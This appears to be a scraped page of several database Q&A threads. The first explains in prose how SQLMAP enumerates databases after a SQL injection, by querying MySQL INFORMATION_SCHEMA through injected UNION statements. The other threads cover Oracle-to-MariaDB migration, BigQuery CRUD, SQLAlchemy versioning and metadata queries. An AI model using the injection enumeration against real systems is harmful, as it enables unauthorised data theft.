I have understood that how SQLMAP checks for vulnerabilities but now i'm fascinated about how after getting the vulnerability SQLMAP fetches the databases, tables, columns. I tried to understand by looking on their github repo but still.
Have a read of this Hakipedia page on SQLi regarding how the MySQL INFORMATION_SCHEMA table is queried in order to fetch database metadata.
The MySQL INFORMATION_SCHEMA database (available from MySQL 5), is made up of table-like objects (aka, system views), that result in the exposure of metadata in a relational format. The execution of arbitrary injections via SELECT statements are thus possible to retrieve or to format said metadata. Metadata is only accessible to an attacker if the objects retrieved are accessible by the current user account. The INFORMATION_SCHEMA database is automatically created by the server upon MySQL installation, and the metadata within is maintained by the server.
For example, a UNION command could be injected into the SQL command to retrieve data from the INFORMATION_SCHEMA tables.
Related
I'm not sure how to go about doing a one time load of the existing data I have in Oracle to MariaDB. I have DBeaver which I am using to access the databases. I saw an option in DBeaver to migrate the data from Source (Oracle) to Target (MariaDB) with a few clicks, but I'm not sure if that's the best approach.
Is writing a python script a better way of doing it? Should I download another tool to do a one time load? We are using CData Sync to do the incremental loads. Basically, it copies data from one database to another (Oracle to SQL Server for example) and it does incremental loads. I'm not sure if I can use it to do a full time/one time load of all the data I have in my Oracle database to MariaDB. I'm new to this, I've never loaded data before. The thing is, I have over 1100 tables so I can't manually write the schema for each table and do a "CREATE TABLE" statement for all 1100 tables...
Option 1 DBeaver
If DBeaver is willing to try it in a few clicks I'd try and see what it gives for some small tables.
Option 2 MariaDB connect
Alternately there MariaDB connect engine using ODBC or JDBC.
Note you don't need to create table structure for all, but do need the list of table and generate CREATE TABLE t1 ENGINE=CONNECT TABLE_TYPE=ODBC tabname='T1' CONNECTION='DSN=XE;.. for each table.
Then it would be:
create database mariadb_migration;
create table mariadb_migration.t1 like t1;
insert into mariadb_migration.t1 select * from t1;
Option 3 MariaDB Oracle Mode
This uses the Oracle compatibility mode of MariaDB.
Take a SQL dump from Oracle.
Prepend SET SQL_MODE='ORACLE'; to start of the dump.
Import this to MariaDB.
Option 4 SQLines
SQLines offer a Oracle to MariaDB
Small disclaimer, I've not done any of these personally, I just know these options exist.
I have a bigquery table about 200 rows, i need to insert,delete and update values in this through a web interface(the table cannot be migrated to any other relational or non-relational database).
The web application will be deployed in google-cloud on app-engine and the user who acts as admin and owner privileges on Bigquery will be able to create and delete records and the other users with view permissions on the dataset in bigquery will be able to view records only.
I am planning to use the scripting language as python,
server(django or flask or any other)-> not sure which one is better
The web application should be displayed as a data-grid like appearance with buttons create,delete or view visiblility according to their roles.
I have not done anything like this in python,bigquery and django. I am already familiar with calling bigquery from python-client but to call in a web interface and in a transactional way, i am totally new.
I am seeing examples only related to django with their inbuilt model and not with big-query.
Can anyone please help me and clarify whether this is possible to implement and how?
I was able to achieve all of "C R U D" on Bigquery with the help of SQLAlchemy, though I had make a lot of concessions like if i use sqlalchemy class i needed to use a false primary key as Bigquery does not use any primary key and for storing sessions i needed to use file based session On Django for updates and create sqlalchemy does not allow without primary key, so i used raw sql part of SqlAlchemy. Thanks to the #mhawke who provided the hint for me to carry out this exericse
No, at most you could achieve the "R" of "CRUD." BigQuery isn't a transactional database, it's for querying vast amounts of data and preparing the results as an immutable view.
It doesn't provide a method to modify the source data directly and even if you did you'd need to run the query again. Also important to note are that queries are asynchronous and require much longer to perform than traditional databases.
The only reasonable solution would be to export the table data to GCS and then import it into a normal database for querying. Alternatively if you can't use another database and since you said there are only 1,000 rows you could perform your CRUD actions directly on that exported CSV.
I'm currently developing a Python Flask app that will allow users to write out paragraphs and store them in a MySQL database. Are there any Python libraries that will let users have the benefits of version control? Ideally users would be able to track edits so that users can revert to previous versions of the text they've written.
If you're using SQL Alchemy, checkout: sqlalchemy-continuum.
Features:
Does not store updates which don’t change anything
Supports alembic migrations
Can revert objects data as well as all object relations at given transaction even if the object was deleted
Transactions can be queried afterwards using SQLAlchemy query syntax
Querying for changed records at given transaction
Querying for versions of entity that modified given property
Querying for transactions, at which entities of a given class changed
History models give access to parent objects relations at any given point in time
Or check versioning-objects in SQLAlchemy documentation.
I also found this tutorial Database Content Versioning Using SQLAlchemy by Googling: sqlalchemy history table, you may find other solutions.
I'm using sqlalchemy in python to execute my sql queries. I have prefixed my sql queries with a show plan on. However I am not getting the plan back from my results. Does anyone know if the results for the plan is stored somewhere in some system table or is there some flag that needs to be enabled for sqlalchemy DB API to capture the plan?
Just to re-iterate I'm running against a sybase database
It might be worth trying
set noexec on
... as well to see if a query plan comes back.
I want to dump oracle objects like tables and stored procedures using cx_Oracle from python ,
is any tutorial how to do this ?
If you are looking for the source code for tables you can use the following:
select DBMS_METADATA.GET_DDL('TABLE','<table_name>') from DUAL;
for stored procedures you can use
select text from all_source where name = '<procedure name>'
In general this is not a cx_Oracle specific problem, just call the oracle specific tables (like all_source) or functions (like get_ddl) and read it in like any other query. There are more of these sorts of tables (like user_source for source that you the specific user own) in Oracle, but I'm doing this off the top of my head and don't have easy access to an Oracle db to remind myself.